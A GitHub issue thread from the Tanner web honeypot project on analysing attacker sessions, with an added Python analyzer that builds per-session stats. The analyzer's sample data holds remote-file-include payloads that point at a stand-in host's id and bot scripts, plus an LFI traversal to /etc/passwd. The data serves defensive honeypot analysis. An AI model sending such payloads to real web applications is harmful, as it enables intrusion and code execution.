Comments (9)
You probably want to have a dict with all the request paths for a session and then count how often a certain path was accessed. Maybe also a timestamp for when each path was accessed. I kind of want to see which paths the attacker tried to access, when, and in which order.
from tanner.
This is a rather open task so don't get hung up on it.
from tanner.
Moved this issue to gsoc_sprint_3
from tanner.
I think a good start for this task is to look at RFI attacks. They usually start with an injection of an id script. They run some simple script that should return some information about the system. If successful, they inject the bot. In the sessions, we should be able to see the stages. Maybe we should start this with a tool to investigate the stored sessions.
from tanner.
1. Maybe we should store the attack type in the session? For now we store paths, and we need to analyze them, i.e. we should do the same thing that we do in detection.
2. When should we initialize the investigation tool? When the session is added/updated, or after the session is pushed to redis? If we use redis, maybe we need to update the old session in redis?
For now I don't fully understand how to investigate a stored session. Count how often a certain path was accessed and its type? Use path timestamps to measure the periods of attacks? (I think humans are slower than network tools and crawlers.) If we use hidden links, we can't say with 100% certainty whether it's a human or a bot (because the attacker can use the page source to access hidden links), but we could maybe store that someone has accessed a hidden link and use it for the investigation.
from tanner.
Both are good ideas, we definitely want the attack type stored in the session. You can start with adding requests/second to the session when you close it.
from tanner.
What do we expect as a result? Maybe we make a JSON for every session with stats, e.g.
{
  "uuid": "session uuid",
  "user_agent": "ua",
  "sensor_uuid": "suuid",
  "start_time": "start timestamp",
  "end_time": "end timestamp",
  "requests/second": "10",
  "approx_time_between_requests": 0.1,
  "accepted_paths": 20,
  "errors": "no",
  "paths": [
    {
      "path": "path1",
      "attack_type": "lfi",
      "payload": "/etc/passwd",
      "time": "timestamp"
    }
  ],
  "possible_owner": "human"
}
from tanner.
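The stats record sketched in the comment above, together with the earlier questions in this thread (counting how often each path was hit and in which order, requests per second and the gap between requests, spotting the stages of an RFI campaign, and flagging hidden-link access without claiming certainty about human versus bot), can be produced from a closed session by a small analyzer. The following is an added example written for this page, not code from the Tanner project: the session layout, the per-request `status` field, the `HUMAN_MIN_GAP_SECONDS` threshold, the `analyze_session` name and the sample session data are all assumptions.

```python
import json
from collections import Counter, OrderedDict
from statistics import median

# Constructed sample session (fake data, not from a Tanner deployment). The
# visitor loads the index, probes with a remote-file-include pointing at an
# "id" script, follows up with a second remote file, tries an LFI, and then
# requests a link that is hidden from normal navigation. Times are epoch
# seconds; the "status" field is an assumption about what a session stores.
SAMPLE_SESSION = {
    "uuid": "11111111-1111-4111-8111-111111111111",
    "sensor_uuid": "22222222-2222-4222-8222-222222222222",
    "user_agent": "Mozilla/5.0 (compatible; hypothetical-scanner/1.0)",
    "paths": [
        {"path": "/index.php", "attack_type": "index", "payload": None,
         "time": 1700000000.00, "status": 200},
        {"path": "/index.php?page=http://203.0.113.5/id.txt",
         "attack_type": "rfi", "payload": "http://203.0.113.5/id.txt",
         "time": 1700000000.25, "status": 200},
        {"path": "/index.php?page=http://203.0.113.5/bot.txt",
         "attack_type": "rfi", "payload": "http://203.0.113.5/bot.txt",
         "time": 1700000000.50, "status": 200},
        {"path": "/index.php?page=../../../../etc/passwd",
         "attack_type": "lfi", "payload": "/etc/passwd",
         "time": 1700000000.75, "status": 200},
        {"path": "/hidden/admin", "attack_type": "index", "payload": None,
         "time": 1700000001.50, "status": 404},
    ],
}

# Hypothetical threshold: a visitor whose typical gap between requests is
# below this is tagged as an automated tool, on the premise that people
# click more slowly than scanners and crawlers do.
HUMAN_MIN_GAP_SECONDS = 1.0


def analyze_session(session, hidden_links=()):
    """Summarise a closed session into a stats record like the one sketched above."""
    paths = sorted(session["paths"], key=lambda p: p["time"])
    if not paths:
        raise ValueError("session has no requests")
    times = [p["time"] for p in paths]
    start, end = times[0], times[-1]
    gaps = [later - earlier for earlier, later in zip(times, times[1:])]
    # Requests per second over the session's lifetime; the one-second floor
    # keeps single-request or same-instant sessions from dividing by zero.
    rps = len(paths) / max(end - start, 1.0)
    # The median gap is robust against one long pause in an otherwise fast burst.
    typical_gap = median(gaps) if gaps else None

    # Path hit counts with the query string stripped, so repeated probes
    # against the same script are grouped together.
    path_counts = Counter(p["path"].split("?", 1)[0] for p in paths)

    # Attack types in order of first appearance, with their payloads in
    # request order: this is where an RFI "probe script, then bot" sequence
    # becomes visible.
    stages = OrderedDict()
    for p in paths:
        stage = stages.setdefault(
            p["attack_type"],
            {"count": 0, "first_seen": p["time"] - start, "payloads": []})
        stage["count"] += 1
        if p["payload"] is not None:
            stage["payloads"].append(p["payload"])

    # Hidden-link hits are recorded as evidence, not used as proof of a bot:
    # an attacker reading the page source can reach them too.
    hidden = set(hidden_links)
    hidden_hits = [p["path"] for p in paths if p["path"] in hidden]

    if typical_gap is None:
        owner = "unknown"
    elif typical_gap < HUMAN_MIN_GAP_SECONDS:
        owner = "tool"
    else:
        owner = "human"

    return {
        "uuid": session["uuid"],
        "user_agent": session["user_agent"],
        "sensor_uuid": session["sensor_uuid"],
        "start_time": start,
        "end_time": end,
        "requests_per_second": rps,
        "approx_time_between_requests": typical_gap,
        "accepted_paths": sum(1 for p in paths if p["status"] < 400),
        "errors": sum(1 for p in paths if p["status"] >= 400),
        "path_counts": dict(path_counts),
        "attack_stages": [dict(attack_type=t, **s) for t, s in stages.items()],
        "hidden_link_accessed": hidden_hits,
        "possible_owner": owner,
    }


def session_stats_json(session, hidden_links=()):
    """JSON text for the stats record, ready to push to a store once the session closes."""
    return json.dumps(analyze_session(session, hidden_links), indent=2)


if __name__ == "__main__":
    print(session_stats_json(SAMPLE_SESSION, hidden_links=["/hidden/admin"]))
```

Run as a script it prints the record for the sample session: four accepted paths and one error, a typical gap of 0.25 s (so `possible_owner` is `tool`), `/index.php` counted four times, and the `rfi` stage listing the id script before the bot payload. The owner label is a single-threshold heuristic; in practice you would keep the raw timing and hidden-link evidence in the record, as this does, rather than trusting the label on its own.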
I'm thinking about storing the evaluation result. Maybe we don't need raw sessions in redis; maybe we should store only sessions that were evaluated?
from tanner.
You are right, we can keep the open sessions in the TANNER Python process memory. Create a separate issue for it.
Closing this issue after merging 7087bb8
from tanner.